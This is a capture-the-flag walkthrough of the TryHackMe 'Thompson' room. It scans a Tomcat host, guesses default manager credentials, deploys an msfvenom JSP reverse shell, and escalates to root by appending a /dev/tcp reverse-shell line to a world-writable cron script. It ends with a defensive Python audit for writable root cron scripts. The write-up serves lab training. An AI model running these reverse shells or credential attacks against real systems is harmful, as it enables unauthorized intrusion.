Thompson

Room Link: https://tryhackme.com/room/bsidesgtthompson

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

Result: TCP/8080 - HTTP; no other ports found

Kali

gobuster dir -u http://$VICTIM:8080 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Tomcat default passwords

password
Password1
password1
admin
tomcat
tomcat
manager
role1
tomcat
changethis
Password1
changethis
password
password1
r00t
root
toor
tomcat
s3cret
password1
password
admin
changethis

I clicked the manager app and tried some default credentials

Username: tomcat
Password: s3cret

Kali

msfvenom -p java/jsp_shell_reverse_tcp LHOST=$KALI LPORT=1337 -f war > rshell.war
nc -lvnp 1337

Upgrade to a fully interactive TTY (tab completion, job control)

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

There is a script in jack's folder that is run by root from cron

Victim

cat /etc/crontab

The script is writable by everyone, so I added the line below to reach back to my Kali box.

Victim

echo 'sh -i >& /dev/tcp/10.10.165.185/1338 0>&1' >> id.sh

Kali

nc -lvnp 1338
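The misconfiguration this step relies on is a root cron job whose script can be modified by an unprivileged user. The following audit script is an added example for defenders, not part of the original writeup: it parses system-crontab entries (/etc/crontab, /etc/cron.d/*) and flags every script run as root that is world- or group-writable or owned by a non-root user. The stat_fn parameter is an assumption added so the check can be exercised offline.

```python
import os
import re
import stat

# System crontab format (/etc/crontab, /etc/cron.d/*): five time fields, a user, then the
# command. @reboot-style shortcuts are not handled by this check.
_SYSTEM_CRON_RE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def extract_script_paths(crontab_text):
    """Return (user, absolute_path) pairs for every absolute path in each cron command."""
    found = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        match = _SYSTEM_CRON_RE.match(line)
        if match is None:
            continue
        for token in match.group("cmd").split():
            if token.startswith("/"):
                found.append((match.group("user"), token))
    return found

def risky_entries(crontab_text, stat_fn=os.stat):
    """Map each script to the reasons it is unsafe for cron to run: world/group-writable
    bits, or a non-root owner while root runs it. stat_fn is an injection point for
    offline testing; in real use leave it as os.stat."""
    findings = {}
    for user, path in extract_script_paths(crontab_text):
        try:
            st = stat_fn(path)
        except FileNotFoundError:
            continue  # path does not exist on this host; nothing to assess
        reasons = []
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if st.st_mode & stat.S_IWGRP:
            reasons.append("group-writable")
        if user == "root" and st.st_uid != 0:
            reasons.append("owned by non-root uid %d" % st.st_uid)
        if reasons:
            findings[path] = reasons
    return findings

if __name__ == "__main__":
    # Audit the live system crontab; each flagged path is a privilege-escalation risk.
    with open("/etc/crontab") as fh:
        for path, reasons in risky_entries(fh.read()).items():
            print("%s: %s" % (path, ", ".join(reasons)))
```

Run it as a periodic host check; the fix for a flagged entry is to move the script to a root-owned directory with mode 0755 (or tighter) and to reference it by absolute path.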
